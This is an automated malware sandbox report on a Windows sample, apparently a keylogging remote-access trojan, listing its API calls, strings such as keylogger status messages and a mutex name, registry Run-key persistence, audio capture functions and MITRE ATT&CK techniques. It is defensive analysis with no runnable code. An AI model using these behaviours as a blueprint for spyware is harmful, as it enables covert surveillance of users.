APIs

GetLocalTime.KERNEL32(?,00473EE8,004745A8,?,?,?,?,?,?,?,00414D7D,?,00000001,0000004C,00000000), ref: 004049F1

Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0

GetLocalTime.KERNEL32(?,00473EE8,004745A8,?,?,?,?,?,?,?,00414D7D,?,00000001,0000004C,00000000), ref: 00404A4E

Strings

KeepAlive | Enabled | Timeout: , xrefs: 004049E5

Memory Dump Source

Source File: 00000000.00000002.1753884184.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1753884184.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753884184.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: LocalTime
String ID: KeepAlive | Enabled | Timeout:
API String ID: 481472006-1507639952
Opcode ID: 5e7112ba3c9312bc4e1150e3cb60ae07be9d5447ad79c948852d529a3a072452
Instruction ID: fa495feba5854bec2644a8330ceabc5ae1d4c14ac10d4033695aa89a80f4fa5c
Opcode Fuzzy Hash: 5e7112ba3c9312bc4e1150e3cb60ae07be9d5447ad79c948852d529a3a072452
Instruction Fuzzy Hash: 5A2126A1A042806BC310FB6AD80A76B7B9497D1319F44407EF849532E2DB3C5999CB9F

Function 02474C21 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 02474C58

Part of subcall function 0248A8ED: GetLocalTime.KERNEL32(00000000), ref: 0248A907

GetLocalTime.KERNEL32(?), ref: 02474CB5

Strings

KeepAlive | Enabled | Timeout: , xrefs: 02474C4C

Memory Dump Source

Source File: 00000000.00000002.1754447898.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: LocalTime
String ID: KeepAlive | Enabled | Timeout:
API String ID: 481472006-1507639952
Opcode ID: 4fbf8cc4982cbc942d3db3f2afc9c4eacdcd9657b35503fb3d66e7a76927aef2
Instruction ID: 4681d3c72f290bb8f154774afa65565192424f42fa1b2361f8da4f0bfacb17d9
Opcode Fuzzy Hash: 4fbf8cc4982cbc942d3db3f2afc9c4eacdcd9657b35503fb3d66e7a76927aef2
Instruction Fuzzy Hash: E4215762A043806FC311F72ADC047BF7BA5A7C1304F45046FE95A03261EBA8558E8BBF

Function 0041A686 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 59timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(00000000), ref: 0041A6A0

Strings

| , xrefs: 0041A6D3
%02i:%02i:%02i:%03i , xrefs: 0041A6B5

Memory Dump Source

Source File: 00000000.00000002.1753884184.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1753884184.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753884184.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: LocalTime
String ID: | $%02i:%02i:%02i:%03i
API String ID: 481472006-2430845779
Opcode ID: 34243c21142b420d1c5f66ae098a6f726f3541150da0381cff6eea629fa7a359
Instruction ID: d205b4ebe2adc0156a37935a73d605e8b5d9817e81284f53efab16a15aec7ece
Opcode Fuzzy Hash: 34243c21142b420d1c5f66ae098a6f726f3541150da0381cff6eea629fa7a359
Instruction Fuzzy Hash: 80114C725082045AC704EBA5D8568AF73E8AB94708F10053FFC85931E1EF38DA84C69E

Function 02476A7C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59COMMON

Download Yara Rule

APIs

CoInitializeEx.COMBASE(00000000,00000002), ref: 02476A9C

Part of subcall function 024769CB: _wcslen.LIBCMT ref: 024769EF
Part of subcall function 024769CB: CoGetObject.OLE32(?,00000024,004659B0,00000000), ref: 02476A50

CoUninitialize.COMBASE ref: 02476AF5

Strings

C:\Users\user\Desktop\2iH7rqx9rQ.exe, xrefs: 02476A7C, 02476A7F, 02476AD1

Memory Dump Source

Source File: 00000000.00000002.1754447898.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: InitializeObjectUninitialize_wcslen
String ID: C:\Users\user\Desktop\2iH7rqx9rQ.exe
API String ID: 3851391207-3168180111
Opcode ID: cc256bbe825efe690782e207798e63cf697be23d062579cdcaa40baaa38e88a5
Instruction ID: 1900961a17f011e2f7584c12db500ab702d302cb6cd161dfee84b5cf391d7f43
Opcode Fuzzy Hash: cc256bbe825efe690782e207798e63cf697be23d062579cdcaa40baaa38e88a5
Instruction Fuzzy Hash: 4A01F572300B106BE2246B21DC4EFBB775EDF42B25F22012FF91087180EFA0DC404A62

Function 02482855 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 02482879
RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 024828AF

Strings

TUF, xrefs: 02482874

Memory Dump Source

Source File: 00000000.00000002.1754447898.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: QueryValue
String ID: TUF
API String ID: 3660427363-3431404234
Opcode ID: b09a7c0ab263ba9602d255bab372d31fcc1af682bb43ba0fd7320c28ba140ab5
Instruction ID: ffc90ba7feef6516b09c3fd8b3eb7015f2dff4a2f3439658db299c3bf60abefd
Opcode Fuzzy Hash: b09a7c0ab263ba9602d255bab372d31fcc1af682bb43ba0fd7320c28ba140ab5
Instruction Fuzzy Hash: 0C014FB6A10108BFEF15DB95DC45EFF7ABEEB48251F14007AF901E2240E6B09F009A60

Function 00419E89 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON

Download Yara Rule

APIs

PathFileExistsW.SHLWAPI(00000000), ref: 00419EAE

Strings

xIG, xrefs: 00419EB8
alarm.wav, xrefs: 00419E99

Memory Dump Source

Source File: 00000000.00000002.1753884184.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1753884184.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753884184.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: ExistsFilePath
String ID: alarm.wav$xIG
API String ID: 1174141254-4080756945
Opcode ID: c657668ac57334f774a26b78daff3b63b718a802db195bfb30f4fe1832019a65
Instruction ID: 7a4fe07350b1461b8d7cab7706a536354aa1130be6e3c83a2e6414618e768e61
Opcode Fuzzy Hash: c657668ac57334f774a26b78daff3b63b718a802db195bfb30f4fe1832019a65
Instruction Fuzzy Hash: 8B01802060420166C604B676D866AEE77458BC1719F40413FF89A966E2EF6CAEC6C2DF

Function 0248A0F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON

Download Yara Rule

APIs

PathFileExistsW.SHLWAPI(00000000), ref: 0248A115

Strings

TUF, xrefs: 0248A124
xIG, xrefs: 0248A11F

Memory Dump Source

Source File: 00000000.00000002.1754447898.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: ExistsFilePath
String ID: TUF$xIG
API String ID: 1174141254-2109147017
Opcode ID: 2fae138b2d3ec9b0a0b8c660c1a787d1356efb4be69c0d9f0b79cf6aaa7c8617
Instruction ID: 63d1d885a2f8dbb2f91762d0c7700d76f561c3a4a4f039a9aa4e20a9fbc534d5
Opcode Fuzzy Hash: 2fae138b2d3ec9b0a0b8c660c1a787d1356efb4be69c0d9f0b79cf6aaa7c8617
Instruction Fuzzy Hash: 4401F11060421167C615F632C815AFE37428B80B40F40802FDD6A573E4EFE59A89CBA7

Function 0040A767 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47COMMON

Download Yara Rule

APIs

Part of subcall function 0040A876: GetLocalTime.KERNEL32(?,Offline Keylogger Started,004740F8), ref: 0040A884
Part of subcall function 0040A876: wsprintfW.USER32 ref: 0040A905

Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0

CloseHandle.KERNEL32(?), ref: 0040A7CA
UnhookWindowsHookEx.USER32 ref: 0040A7DD

Strings

Online Keylogger Stopped, xrefs: 0040A777, 0040A77F, 0040A7A6

Memory Dump Source

Source File: 00000000.00000002.1753884184.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1753884184.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753884184.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: LocalTime$CloseHandleHookUnhookWindowswsprintf
String ID: Online Keylogger Stopped
API String ID: 1623830855-1496645233
Opcode ID: d212207523bdbdfb939cafe4e871aa7c6c8b4649ead1cba3e091536141993f00
Instruction ID: 3c154674506c802d119dc10506b29c5389a087cae46ba36945c53301bfe6088f
Opcode Fuzzy Hash: d212207523bdbdfb939cafe4e871aa7c6c8b4649ead1cba3e091536141993f00
Instruction Fuzzy Hash: CC01D431A043019BDB25BB35C80B7AEBBB59B45315F80407FE481225D2EB7999A6C3DB

Function 0247A9CE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47COMMON

Download Yara Rule

APIs

Part of subcall function 0247AADD: GetLocalTime.KERNEL32(?,Offline Keylogger Started,004740F8), ref: 0247AAEB
Part of subcall function 0247AADD: wsprintfW.USER32 ref: 0247AB6C

Part of subcall function 0248A8ED: GetLocalTime.KERNEL32(00000000), ref: 0248A907

CloseHandle.KERNEL32(?), ref: 0247AA31
UnhookWindowsHookEx.USER32 ref: 0247AA44

Strings

Online Keylogger Stopped, xrefs: 0247A9DE, 0247A9E6, 0247AA0D

Memory Dump Source

Source File: 00000000.00000002.1754447898.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: LocalTime$CloseHandleHookUnhookWindowswsprintf
String ID: Online Keylogger Stopped
API String ID: 1623830855-1496645233
Opcode ID: a471bc76fffd1fbac32a3585e4c4fab67e2de2ee53134a9f9046e82175b62acd
Instruction ID: 00a6eca3e561530d4d8149d19fcdfa53be6b6f9cd5dc02eaabbb7d72350b1fdf
Opcode Fuzzy Hash: a471bc76fffd1fbac32a3585e4c4fab67e2de2ee53134a9f9046e82175b62acd
Instruction Fuzzy Hash: AD012031A042109BCB16B739C9067FE7BB2AF41300F40049FD95212592EBA55499DBE6

Function 0247194F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45COMMON

Download Yara Rule

APIs

waveInPrepareHeader.WINMM(00473D90,00000020,00475BF4,00475BF4,00000000,00475B70,00473EE8,?,00000000,02471B7A), ref: 024719AE
waveInAddBuffer.WINMM(00473D90,00000020,?,00000000,02471B7A), ref: 024719C4

Strings

T=G, xrefs: 0247195D

Memory Dump Source

Source File: 00000000.00000002.1754447898.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: wave$BufferHeaderPrepare
String ID: T=G
API String ID: 2315374483-379896819
Opcode ID: 0ff4070462d876ba9a0314f854ca9e5b2f4718fb39603aa566027c6b2d74496f
Instruction ID: 1a6f578801c3c2943686fd8c157a7c57ed7d58898b50385076fe4afc15eaaf91
Opcode Fuzzy Hash: 0ff4070462d876ba9a0314f854ca9e5b2f4718fb39603aa566027c6b2d74496f
Instruction Fuzzy Hash: E3018B71301340AFD7109F29EC44AA5BBAAFB49316B01453EE91DC3661EB71A8549BA8

Function 00447790 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35COMMONLIBRARYCODE

Download Yara Rule

APIs

IsValidLocale.KERNEL32(00000000,j=D,00000000,00000001,?,?,00443D6A,?,?,?,?,00000004), ref: 004477DC

Strings

j=D, xrefs: 004477D3, 004477C0
IsValidLocaleName, xrefs: 004477A1, 004477AB

Memory Dump Source

Source File: 00000000.00000002.1753884184.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1753884184.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753884184.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: LocaleValid
String ID: IsValidLocaleName$j=D
API String ID: 1901932003-3128777819
Opcode ID: 34048a5779238571e042b1bd9c847fb843bb8be3ea41a6d98ed8d0d1ded4c140
Instruction ID: d075984350fdfa8650c9f53b231b8a0b142c4dacf6ed37e79753978632a381d4
Opcode Fuzzy Hash: 34048a5779238571e042b1bd9c847fb843bb8be3ea41a6d98ed8d0d1ded4c140
Instruction Fuzzy Hash: B7F0E930A45218F7EA116B61DC06F5EBB54CF49B11F50407AFD056A293CB796D0195DC

Function 00401D91 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00401D96

Strings

T=G, xrefs: 00401DB7
T=G, xrefs: 00401DDB

Memory Dump Source

Source File: 00000000.00000002.1753884184.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1753884184.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753884184.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: H_prolog
String ID: T=G$T=G
API String ID: 3519838083-3732185208
Opcode ID: ece060f59eec47038b163f6730b9b4774a9df75ced3df6c836fae2af045d366e
Instruction ID: 37a3980bbf64332544f5ef03d086655580814226aad47650f393c0c18fea351b
Opcode Fuzzy Hash: ece060f59eec47038b163f6730b9b4774a9df75ced3df6c836fae2af045d366e
Instruction Fuzzy Hash: BCF0E971A00220ABC714BB65C80669EB774EF41369F10827FB416B72E1CBBD5D04D65D

Function 0040AD56 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 32keyboardCOMMON

Download Yara Rule

APIs

GetKeyState.USER32(00000011), ref: 0040AD5B

Part of subcall function 00409B10: GetForegroundWindow.USER32 ref: 00409B3F
Part of subcall function 00409B10: GetWindowThreadProcessId.USER32(00000000,?), ref: 00409B4B
Part of subcall function 00409B10: GetKeyboardLayout.USER32(00000000), ref: 00409B52
Part of subcall function 00409B10: GetKeyState.USER32(00000010), ref: 00409B5C
Part of subcall function 00409B10: GetKeyboardState.USER32(?), ref: 00409B67
Part of subcall function 00409B10: ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 00409B8A
Part of subcall function 00409B10: ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 00409BE3

Part of subcall function 00409D58: SetEvent.KERNEL32(00000000,?,00000000,0040A91C,00000000), ref: 00409D84

Strings

[AltL], xrefs: 0040AD9D
[AltR], xrefs: 0040AD91

Memory Dump Source

Source File: 00000000.00000002.1753884184.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1753884184.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753884184.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: State$KeyboardUnicodeWindow$EventForegroundLayoutProcessThread
String ID: [AltL]$[AltR]
API String ID: 2738857842-2658077756
Opcode ID: e4783406b8090f957eb699ebcca1d9f5d1236a3a3c59c967461c79b8c7bb50b0
Instruction ID: d2c0c429c9fe13b3c6c970781ecfc4970ab7400740a1dec538c1fc9fef0a0b20
Opcode Fuzzy Hash: e4783406b8090f957eb699ebcca1d9f5d1236a3a3c59c967461c79b8c7bb50b0
Instruction Fuzzy Hash: 47E0652134072117C898323EA91E6EE3A228F82B65B80416FF8866BAD6DD6D4D5053CB

Function 00448803 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 28COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00448825

Part of subcall function 00446AC5: HeapFree.KERNEL32(00000000,00000000,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?), ref: 00446ADB
Part of subcall function 00446AC5: GetLastError.KERNEL32(?,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?,?), ref: 00446AED

Strings

`@, xrefs: 00448809
`@, xrefs: 00448808

Memory Dump Source

Source File: 00000000.00000002.1753884184.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1753884184.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753884184.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: ErrorFreeHeapLast_free
String ID: `@$`@
API String ID: 1353095263-20545824
Opcode ID: 9a963da6b0d453c70d37714207bd95daf40472698ea915a46c6a843fe12f4396
Instruction ID: 46705ffcfacdd7a720b29fb61e5cb4af2d59a6418439a2947ca99394172970e0
Opcode Fuzzy Hash: 9a963da6b0d453c70d37714207bd95daf40472698ea915a46c6a843fe12f4396
Instruction Fuzzy Hash: B9E06D761006059F8720DE6DD400A86B7E4EF95360320852AE89DE3310DB32E812CB40

Function 0040ADB0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 24keyboardCOMMON

Download Yara Rule

APIs

GetKeyState.USER32(00000012), ref: 0040ADB5

Strings

[CtrlL], xrefs: 0040ADE3
[CtrlR], xrefs: 0040ADD2

Memory Dump Source

Source File: 00000000.00000002.1753884184.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1753884184.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753884184.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: State
String ID: [CtrlL]$[CtrlR]
API String ID: 1649606143-2446555240
Opcode ID: 1a2acc7ae96ea6d3970b85c1ad092b7db079889dc64632d6b42e586a77c2ffe8
Instruction ID: 615b7dbe40c0b8188db9493e0f2b19f017fb36a74fa458c508a435569d7d4a1e
Opcode Fuzzy Hash: 1a2acc7ae96ea6d3970b85c1ad092b7db079889dc64632d6b42e586a77c2ffe8
Instruction Fuzzy Hash: 71E0862170071117C514353DD61A67F39228F41776F80013FF882ABAC6E96D8D6023CB

Function 0041297A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 23registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00000000,00000002,?,80000002,80000002,0040C33C,00000000,?,00000000), ref: 00412988
RegDeleteValueW.ADVAPI32(?,?,?,00000000), ref: 00412998

Strings

Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 00412986

Memory Dump Source

Source File: 00000000.00000002.1753884184.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1753884184.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753884184.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: DeleteOpenValue
String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
API String ID: 2654517830-1051519024
Opcode ID: 37dabd9028f0cede140cc98497e4e15f557d68d096268be44a89a64eb946223e
Instruction ID: 4813e9247c8a4fa7715124fbb4df20ddc3d96ddce1d5e270e7c0f337b45b5704
Opcode Fuzzy Hash: 37dabd9028f0cede140cc98497e4e15f557d68d096268be44a89a64eb946223e
Instruction Fuzzy Hash: 0AE01270310304BFEF104F61ED06FDB37ACBB80B89F004165F505E5191E2B5DD54A658

Function 02482BE1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 23registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00000000,00000002,?,80000002,80000002,0247C5A3,00000000,?,00000000), ref: 02482BEF
RegDeleteValueW.ADVAPI32(?,?,?,00000000), ref: 02482BFF

Strings

Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 02482BED

Memory Dump Source

Source File: 00000000.00000002.1754447898.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: DeleteOpenValue
String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
API String ID: 2654517830-1051519024
Opcode ID: 37dabd9028f0cede140cc98497e4e15f557d68d096268be44a89a64eb946223e
Instruction ID: c0b63ea8ff36050810063e176297b216891d487193582a94a53ea82f0dab5491
Opcode Fuzzy Hash: 37dabd9028f0cede140cc98497e4e15f557d68d096268be44a89a64eb946223e
Instruction Fuzzy Hash: 7AE01270210304BAEF10AF61AC06FAF37ACEB40B89F004165FA01E5191D3B1D904AA54

Function 0247C13E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13synchronizationCOMMON

Download Yara Rule

APIs

CreateMutexA.KERNEL32(00000000,00000001,00000000,0247DC11,0000000D,00000033,00000000,00000032,00000000,0046662C,00000000,0000000E,00000000,0046556C,00000003,00000000), ref: 0247C14D
GetLastError.KERNEL32 ref: 0247C158

Strings

Rmc-I7G983, xrefs: 0247C13E

Memory Dump Source

Source File: 00000000.00000002.1754447898.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: CreateErrorLastMutex
String ID: Rmc-I7G983
API String ID: 1925916568-3173645232
Opcode ID: defc0333e3605ddb085507e8cb5f1de2847b42d11ba618549d06c615cf8541f0
Instruction ID: c0dde3b618e04ca2db991fbde2fcf083a0181aed1088eb9ce4b05daf16bf5ca9
Opcode Fuzzy Hash: defc0333e3605ddb085507e8cb5f1de2847b42d11ba618549d06c615cf8541f0
Instruction Fuzzy Hash: B1D012747483019BD7281B747C897693555F784703F00407EB60FC55D0CF6488409D25

Function 0043FA5E Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00401AD8), ref: 0043FAF4
GetLastError.KERNEL32 ref: 0043FB02
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0043FB5D

Memory Dump Source

Source File: 00000000.00000002.1753884184.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1753884184.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753884184.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide$ErrorLast
String ID:
API String ID: 1717984340-0
Opcode ID: 3f0ff04a5dcf7e8fd5b137fcdb20dceab511bd439b95d46b3d550210e9ecb368
Instruction ID: ecac45699e256c48587d6f27f66036641a8fb520bb473c9b2adecd150689d728
Opcode Fuzzy Hash: 3f0ff04a5dcf7e8fd5b137fcdb20dceab511bd439b95d46b3d550210e9ecb368
Instruction Fuzzy Hash: 65414871E00206AFCF258F65C854ABBFBA4EF09310F1451BAF858973A1DB38AD09C759

Function 024AFCC5 Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,02471D3F), ref: 024AFD5B
GetLastError.KERNEL32 ref: 024AFD69
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 024AFDC4

Memory Dump Source

Source File: 00000000.00000002.1754447898.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide$ErrorLast
String ID:
API String ID: 1717984340-0
Opcode ID: 51d5f03fba1b172d5651f1593246994e43d26d1415dc77cb91aa80c4233d165d
Instruction ID: 966b8efb3ffe006f5b8ba12d5cac4d7c063930f471459f5b54cfc3027b091768
Opcode Fuzzy Hash: 51d5f03fba1b172d5651f1593246994e43d26d1415dc77cb91aa80c4233d165d
Instruction Fuzzy Hash: D8412B31604206AFCF228FA5C954BBB7BB5EF11324F1641AFF85A5B791EB328805CB50

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager ( `services.exe` ) is an interface to manage and manipulate services.The service control manager is accessible to users via GUI components as well as system utilities such as `sc.exe` and Net .
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: Process Creation, Service: Service Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Driver: Driver Load, File: File Metadata, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Service: Service Creation, Service: Service Modification, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

